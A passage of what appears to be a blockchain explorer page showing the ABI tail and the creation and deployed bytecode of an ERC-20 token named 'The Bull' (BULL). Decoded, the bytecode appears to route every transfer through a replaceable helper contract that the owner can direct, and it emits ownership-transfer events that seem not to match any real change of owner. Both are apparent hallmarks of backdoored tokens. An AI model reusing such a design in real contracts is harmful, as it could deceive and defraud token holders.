:"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040525f8060146101000a81548160ff02191690831515021790555034801562000029575f80fd5b506040518060400160405280600881526020017f5468652042756c6c0000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f42554c4c000000000000000000000000000000000000000000000000000000008152505f620000a7620001d460201b60201c565b9050805f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000f981620001db60201b60201c565b5081600590816200010b9190620006b2565b5080600690816200011d9190620006b2565b50600960075f6101000a81548160ff021916908360ff160217905550604051620001479062000440565b604051809103905ff08015801562000161573d5f803e3d5ffd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050620001ce620001b8620001d460201b60201c565b683635c9adc5dea000006200025260201b60201c565b62000915565b5f33905090565b8073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360015f60146101000a81548160ff02191690831515021790555050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002c3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002ba90620007f4565b60405180910390fd5b620002da81600454620003de60201b90919060201c565b600481905550620003328160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054620003de60201b90919060201c565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003d2919062000825565b60405180910390a35050565b5f808284620003ee91906200086d565b90508381101562000436576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200042d90620008f5565b60405180910390fd5b8091505092915050565b6101fe806200392f83390190565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620004ca57607f821691505b602082108103620004e057620004df62000485565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005447fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000507565b62000550868362000507565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200059a620005946200058e8462000568565b62000571565b62000568565b9050919050565b5f819050919050565b620005b5836200057a565b620005cd620005c482620005a1565b84845462000513565b825550505050565b5f90565b620005e3620005d5565b620005f0818484620005aa565b505050565b5b8181101562000617576200060b5f82620005d9565b600181019050620005f6565b5050565b601f82111562000666576200063081620004e6565b6200063b84620004f8565b810160208510156200064b578190505b620006636200065a85620004f8565b830182620005f5565b50505b505050565b5f82821c905092915050565b5f620006885f19846008026200066b565b1980831691505092915050565b5f620006a2838362000677565b9150826002028217905092915050565b620006bd826200044e565b67ffffffffffffffff811115620006d957620006d862000458565b5b620006e58254620004b2565b620006f28282856200061b565b5f60209050601f83116001811462000728575f841562000713578287015190505b6200071f858262000695565b8655506200078e565b601f1984166200073886620004e6565b5f5b8281101562000761578489015182556001820191506020850194506020810190506200073a565b868310156200078157848901516200077d601f89168262000677565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620007dc601f8362000796565b9150620007e982620007a6565b602082019050919050565b5f6020820190508181035f8301526200080d81620007ce565b9050919050565b6200081f8162000568565b82525050565b5f6020820190506200083a5f83018462000814565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620008798262000568565b9150620008868362000568565b9250828201905080821115620008a157620008a062000840565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f620008dd601b8362000796565b9150620008ea82620008a7565b602082019050919050565b5f6020820190508181035f8301526200090e81620008cf565b9050919050565b61300c80620009235f395ff3fe608060405234801561000f575f80fd5b5060043610610171575f3560e01c8063787ca65f116100dc578063a457c2d711610095578063dd62ed3e1161006f578063dd62ed3e14610473578063e7a324dc146104a3578063f1127ed8146104c1578063f2fde38b146104f257610171565b8063a457c2d7146103f7578063a9059cbb14610427578063b792d03f1461045757610171565b8063787ca65f146103355780637c519ffb146103515780637ecebe001461035b5780638da5cb5b1461038b57806395d89b41146103a95780639ab24eb0146103c757610171565b8063395093511161012e578063395093511461024d5780634ada218b1461027d5780636fcfff451461029b57806370a08231146102cb578063715018a6146102fb578063782d6fe11461030557610171565b806306fdde0314610175578063095ea7b31461019357806318160ddd146101c357806320606b70146101e157806323b872dd146101ff578063313ce5671461022f575b5f80fd5b61017d61050e565b60405161018a919061224c565b60405180910390f35b6101ad60048036038101906101a891906122fd565b61059e565b6040516101ba9190612355565b60405180910390f35b6101cb6105bb565b6040516101d8919061237d565b60405180910390f35b6101e96105c4565b6040516101f691906123ae565b60405180910390f35b610219600480360381019061021491906123c7565b6105e8565b6040516102269190612355565b60405180910390f35b6102376106bc565b6040516102449190612432565b60405180910390f35b610267600480360381019061026291906122fd565b6106d1565b6040516102749190612355565b60405180910390f35b61028561077f565b6040516102929190612355565b60405180910390f35b6102b560048036038101906102b0919061244b565b610791565b6040516102c29190612494565b60405180910390f35b6102e560048036038101906102e0919061244b565b6107b1565b6040516102f2919061237d565b60405180910390f35b6103036107f7565b005b61031f600480360381019061031a91906122fd565b61092d565b60405161032c919061237d565b60405180910390f35b61034f600480360381019061034a91906124ad565b610cdb565b005b610359610e81565b005b6103756004803603810190610370919061244b565b610f27565b604051610382919061237d565b60405180910390f35b610393610f3c565b6040516103a09190612520565b60405180910390f35b6103b1610f63565b6040516103be919061224c565b60405180910390f35b6103e160048036038101906103dc919061244b565b610ff3565b6040516103ee919061237d565b60405180910390f35b610411600480360381019061040c91906122fd565b6110c8565b60405161041e9190612355565b60405180910390f35b610441600480360381019061043c91906122fd565b611190565b60405161044e9190612355565b60405180910390f35b610471600480360381019061046c919061244b565b6111ad565b005b61048d60048036038101906104889190612539565b611224565b60405161049a919061237d565b60405180910390f35b6104ab6112a6565b6040516104b891906123ae565b60405180910390f35b6104db60048036038101906104d691906125a1565b6112ca565b6040516104e99291906125df565b60405180910390f35b61050c6004803603810190610507919061244b565b611304565b005b60606005805461051d90612633565b80601f016020809104026020016040519081016040528092919081815260200182805461054990612633565b80156105945780601f1061056b57610100808354040283529160200191610594565b820191905f5260205f20905b81548152906001019060200180831161057757829003601f168201915b5050505050905090565b5f6105b16105aa6114a9565b84846114b0565b6001905092915050565b5f600454905090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b5f6105f4848484611673565b6106b1846106006114a9565b6106ac85604051806060016040528060288152602001612f5c6028913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6106636114a9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117469092919063ffffffff16565b6114b0565b600190509392505050565b5f60075f9054906101000a900460ff16905090565b5f6107756106dd6114a9565b846107708560025f6106ed6114a9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117a390919063ffffffff16565b6114b0565b6001905092915050565b60035f9054906101000a900460ff1681565b600a602052805f5260405f205f915054906101000a900463ffffffff1681565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107ff6114a9565b73ffffffffffffffffffffffffffffffffffffffff1661081d610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614610873576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086a906126ad565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f805f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f438210610970576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109679061273b565b60405180910390fd5b5f600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f8163ffffffff16036109d6575f915050610cd5565b8260095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600184610a229190612786565b63ffffffff1663ffffffff1681526020019081526020015f205f015f9054906101000a900463ffffffff1663ffffffff1611610ac85760095f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600183610aa39190612786565b63ffffffff1663ffffffff1681526020019081526020015f2060010154915050610cd5565b8260095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8063ffffffff1681526020019081526020015f205f015f9054906101000a900463ffffffff1663ffffffff161115610b42575f915050610cd5565b5f80600183610b519190612786565b90505b8163ffffffff168163ffffffff161115610c73575f60028383610b779190612786565b610b8191906127ea565b82610b8c9190612786565b90505f60095f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8363ffffffff1663ffffffff1681526020019081526020015f206040518060400160405290815f82015f9054906101000a900463ffffffff1663ffffffff1663ffffffff168152602001600182015481525050905086815f015163ffffffff1603610c4357806020015195505050505050610cd5565b86815f015163ffffffff161015610c5c57819350610c6c565b600182610c699190612786565b92505b5050610b54565b60095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8363ffffffff1663ffffffff1681526020019081526020015f206001015493505050505b92915050565b610ce36114a9565b73ffffffffffffffffffffffffffffffffffffffff16610d01610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614610d57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4e906126ad565b60405180910390fd5b6001151560035f9054906101000a900460ff16151503610e7b575f821115610d8757610d8281611800565b610dee565b604051610d93906121b5565b604051809103905ff080158015610dac573d5f803e3d5ffd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28585856040518463ffffffff1660e01b8152600401610e4d9392919061281a565b5f604051808303815f87803b158015610e64575f80fd5b505af1158015610e76573d5f803e3d5ffd5b505050505b50505050565b610e896114a9565b73ffffffffffffffffffffffffffffffffffffffff16610ea7610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614610efd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef4906126ad565b60405180910390fd5b60035f9054906101000a900460ff161560035f6101000a81548160ff021916908315150217905550565b600b602052805f5260405f205f915090505481565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610f7290612633565b80601f0160208091040260200160405190810160405280929190818152602001828054610f9e90612633565b8015610fe95780601f10610fc057610100808354040283529160200191610fe9565b820191905f5260205f20905b815481529060010190602001808311610fcc57829003601f168201915b5050505050905090565b5f80600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f8163ffffffff1611611057575f6110c0565b60095f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6001836110a29190612786565b63ffffffff1663ffffffff1681526020019081526020015f20600101545b915050919050565b5f6111866110d46114a9565b8461118185604051806060016040528060258152602001612fb26025913960025f6110fd6114a9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117469092919063ffffffff16565b6114b0565b6001905092915050565b5f6111a361119c6114a9565b8484611673565b6001905092915050565b8073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360015f60146101000a81548160ff02191690831515021790555050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b6009602052815f5260405f20602052805f5260405f205f9150915050805f015f9054906101000a900463ffffffff16908060010154905082565b61130c6114a9565b73ffffffffffffffffffffffffffffffffffffffff1661132a610f3c565b73ffffffffffffffffffffffffffffffffffffffff1614611380576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611377906126ad565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113e5906128bf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361151e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115159061294d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361158c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611583906129db565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611666919061237d565b60405180910390a3505050565b61167e838383611852565b61174160085f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660085f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611adf565b505050565b5f83831115829061178d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611784919061224c565b60405180910390fd5b50828461179a91906129f9565b90509392505050565b5f8082846117b19190612a2c565b9050838110156117f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117ed90612aa9565b60405180910390fd5b8091505092915050565b611808611d75565b1561184f5780600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b790612b37565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361192e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192590612bc5565b60405180910390fd5b611939838383611d8a565b6119a381604051806060016040528060268152602001612f366026913960015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117469092919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611a348160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546117a390919063ffffffff16565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ad2919061237d565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611b1a57505f81115b15611d70575f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611c47575f600a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f808263ffffffff1611611bb6575f611c1f565b60095f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600184611c019190612786565b63ffffffff1663ffffffff1681526020019081526020015f20600101545b90505f611c358483611e1b90919063ffffffff16565b9050611c4386848484611e73565b5050505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611d6f575f600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900463ffffffff1690505f808263ffffffff1611611cde575f611d47565b60095f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600184611d299190612786565b63ffffffff1663ffffffff1681526020019081526020015f20600101545b90505f611d5d84836117a390919063ffffffff16565b9050611d6b85848484611e73565b5050505b5b505050565b5f8060149054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28484846040518463ffffffff1660e01b8152600401611de99392919061281a565b5f604051808303815f87803b158015611e00575f80fd5b505af1158015611e12573d5f803e3d5ffd5b50505050505050565b5f82821115611e5f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5690612c2d565b60405180910390fd5b8183611e6b91906129f9565b905092915050565b5f611e96436040518060600160405280602e8152602001612f84602e9139612160565b90505f8463ffffffff16118015611f2d57508063ffffffff1660095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600187611efa9190612786565b63ffffffff1663ffffffff1681526020019081526020015f205f015f9054906101000a900463ffffffff1663ffffffff16145b15611fa3578160095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f600187611f7e9190612786565b63ffffffff1663ffffffff1681526020019081526020015f2060010181905550612109565b60405180604001604052808263ffffffff1681526020018381525060095f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8663ffffffff1663ffffffff1681526020019081526020015f205f820151815f015f6101000a81548163ffffffff021916908363ffffffff160217905550602082015181600101559050508363ffffffff1660018561205b9190612c4b565b63ffffffff16116120a1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161209890612cf2565b60405180910390fd5b6001846120ae9190612c4b565b600a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548163ffffffff021916908363ffffffff1602179055505b8473ffffffffffffffffffffffffffffffffffffffff167fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a7248484604051612151929190612d10565b60405180910390a25050505050565b5f640100000000831082906121ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121a2919061224c565b60405180910390fd5b5082905092915050565b6101fe80612d3883390190565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156121f95780820151818401526020810190506121de565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61221e826121c2565b61222881856121cc565b93506122388185602086016121dc565b61224181612204565b840191505092915050565b5f6020820190508181035f8301526122648184612214565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61229982612270565b9050919050565b6122a98161228f565b81146122b3575f80fd5b50565b5f813590506122c4816122a0565b92915050565b5f819050919050565b6122dc816122ca565b81146122e6575f80fd5b50565b5f813590506122f7816122d3565b92915050565b5f80604083850312156123135761231261226c565b5b5f612320858286016122b6565b9250506020612331858286016122e9565b9150509250929050565b5f8115159050919050565b61234f8161233b565b82525050565b5f6020820190506123685f830184612346565b92915050565b612377816122ca565b82525050565b5f6020820190506123905f83018461236e565b92915050565b5f819050919050565b6123a881612396565b82525050565b5f6020820190506123c15f83018461239f565b92915050565b5f805f606084860312156123de576123dd61226c565b5b5f6123eb868287016122b6565b93505060206123fc868287016122b6565b925050604061240d868287016122e9565b9150509250925092565b5f60ff82169050919050565b61242c81612417565b82525050565b5f6020820190506124455f830184612423565b92915050565b5f602082840312156124605761245f61226c565b5b5f61246d848285016122b6565b91505092915050565b5f63ffffffff82169050919050565b61248e81612476565b82525050565b5f6020820190506124a75f830184612485565b92915050565b5f805f80608085870312156124c5576124c461226c565b5b5f6124d2878288016122b6565b94505060206124e3878288016122b6565b93505060406124f4878288016122e9565b9250506060612505878288016122b6565b91505092959194509250565b61251a8161228f565b82525050565b5f6020820190506125335f830184612511565b92915050565b5f806040838503121561254f5761254e61226c565b5b5f61255c858286016122b6565b925050602061256d858286016122b6565b9150509250929050565b61258081612476565b811461258a575f80fd5b50565b5f8135905061259b81612577565b92915050565b5f80604083850312156125b7576125b661226c565b5b5f6125c4858286016122b6565b92505060206125d58582860161258d565b9150509250929050565b5f6040820190506125f25f830185612485565b6125ff602083018461236e565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061264a57607f821691505b60208210810361265d5761265c612606565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6126976020836121cc565b91506126a282612663565b602082019050919050565b5f6020820190508181035f8301526126c48161268b565b9050919050565b7f6765745072696f72566f7465733a206e6f74207965742064657465726d696e655f8201527f6400000000000000000000000000000000000000000000000000000000000000602082015250565b5f6127256021836121cc565b9150612730826126cb565b604082019050919050565b5f6020820190508181035f83015261275281612719565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61279082612476565b915061279b83612476565b9250828203905063ffffffff8111156127b7576127b6612759565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6127f482612476565b91506127ff83612476565b92508261280f5761280e6127bd565b5b828204905092915050565b5f60608201905061282d5f830186612511565b61283a6020830185612511565b612847604083018461236e565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6128a96026836121cc565b91506128b48261284f565b604082019050919050565b5f6020820190508181035f8301526128d68161289d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6129376024836121cc565b9150612942826128dd565b604082019050919050565b5f6020820190508181035f8301526129648161292b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6129c56022836121cc565b91506129d08261296b565b604082019050919050565b5f6020820190508181035f8301526129f2816129b9565b9050919050565b5f612a03826122ca565b9150612a0e836122ca565b9250828203905081811115612a2657612a25612759565b5b92915050565b5f612a36826122ca565b9150612a41836122ca565b9250828201905080821115612a5957612a58612759565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612a93601b836121cc565b9150612a9e82612a5f565b602082019050919050565b5f6020820190508181035f830152612ac081612a87565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612b216025836121cc565b9150612b2c82612ac7565b604082019050919050565b5f6020820190508181035f830152612b4e81612b15565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612baf6023836121cc565b9150612bba82612b55565b604082019050919050565b5f6020820190508181035f830152612bdc81612ba3565b9050919050565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f7700005f82015250565b5f612c17601e836121cc565b9150612c2282612be3565b602082019050919050565b5f6020820190508181035f830152612c4481612c0b565b9050919050565b5f612c5582612476565b9150612c6083612476565b9250828201905063ffffffff811115612c7c57612c7b612759565b5b92915050565b7f5f7772697465436865636b706f696e743a206e657720636865636b706f696e745f8201527f2065786365656473203332206269747300000000000000000000000000000000602082015250565b5f612cdc6030836121cc565b9150612ce782612c82565b604082019050919050565b5f6020820190508181035f830152612d0981612cd0565b9050919050565b5f604082019050612d235f83018561236e565b612d30602083018461236e565b939250505056fe608060405234801561000f575f80fd5b506101e18061001d5f395ff3fe608060405234801561000f575f80fd5b5060043610610029575f3560e01c80636bf92ea21461002d575b5f80fd5b6100476004803603810190610042919061015b565b610049565b005b805f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6100f7826100ce565b9050919050565b610107816100ed565b8114610111575f80fd5b50565b5f81359050610122816100fe565b92915050565b5f819050919050565b61013a81610128565b8114610144575f80fd5b50565b5f8135905061015581610131565b92915050565b5f805f60608486031215610172576101716100ca565b5b5f61017f86828701610114565b935050602061019086828701610114565b92505060406101a186828701610147565b915050925092509256fea2646970667358221220c5cad3415f2ddc756382156050b47f17a0ec2452edd2dfd8a21996db1884746a64736f6c6343000814003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122038f6d22fb458e62ded9255127e4ca4b1c4107b43b89519ce1a04c50eef563ca664736f6c63430008140033608060405234801561000f575f80fd5b506101e18061001d5f395ff3fe608060405234801561000f575f80fd5b5060043610610029575f3560e01c80636bf92ea21461002d575b5f80fd5b6100476004803603810190610042919061015b565b610049565b005b805f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6100f7826100ce565b9050919050565b610107816100ed565b8114610111575f80fd5b50565b5f81359050610122816100fe565b92915050565b5f819050919050565b61013a81610128565b8114610144575f80fd5b50565b5f8135905061015581610131565b92915050565b5f805f60608486031215610172576101716100ca565b5b5f61017f86828701610114565b935050602061019086828701610114565b92505060406101a186828701610147565b915050925092509256fea2646970667358221220c5cad3415f2ddc756382156050b47f17a0ec2452edd2dfd8a21996db1884746a64736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610171575f3560e01c8063787ca65f116100dc578063a457c2d711610095578063dd62ed3e1161006f578063dd62ed3e14610473578063e7a324dc146104a3578063f1127ed8146104c1578063f2fde38b146104f257610171565b8063a457c2d7146103f7578063a9059cbb14610427578063b792d03f1461045757610171565b8063787ca65f146103355780637c519ffb146103515780637ecebe001461035b5780638da5cb5b1461038b57806395d89b41146103a95780639ab24eb0146103c757610171565b8063395093511161012e578063395093511461024d5780634ada218b1461027d5780636fcfff451461029b57806370a08231146102cb578063715018a6146102fb578063782d6fe11461030557610171565b806306fdde0314610175578063095ea7b31461019357806318160ddd146101c357806320606b70146101e157806323b872dd146101ff578063313ce5671461022f575b5f80fd5b61017d61050e565b60405161018a919061224c565b60405180910390f35b6101ad60048036038101906101a891906122fd565b61059e565b6040516101ba9190612355565b60405180910390f35b6101cb6105bb565b6040516101d8919061237d565b60405180910390f35b6101e96105c4565b6040516101f691906123ae565b60405180910390f35b610219600480360381019061021491906123c7565b6105e8565b6040516102269190612355565b60405180910390f35b6102376106bc565b6040516102449190612432565b60405180910390f35b610267600480360381019061026291906122fd565b6106d1565b6040516102749190612355565b60405180910390f35b61028561077f565b6040516102929190612355565b60405180910390f35b6102b560048036038101906102b0919061244b565b610791565b6040516102c29190612494565b60405180910390f35b6102e560048036038101906102e0919061244b565b6107b1565b6040516102f2919061237d565b60405180910390f35b6103036107f7565b005b61031f600480360381019061031a91906122fd565b61092d565b60405161032c919061237d565b60405180910390f35b61034f600480360381019061034a91906124ad565b610cdb565b005b610359610e81565b005b6103756004803603810190610370919061244b565b610f27565b604051610382919061237d565b60405180910390f35b610393610f3c565b6040516103a09190612520565b60405180910390f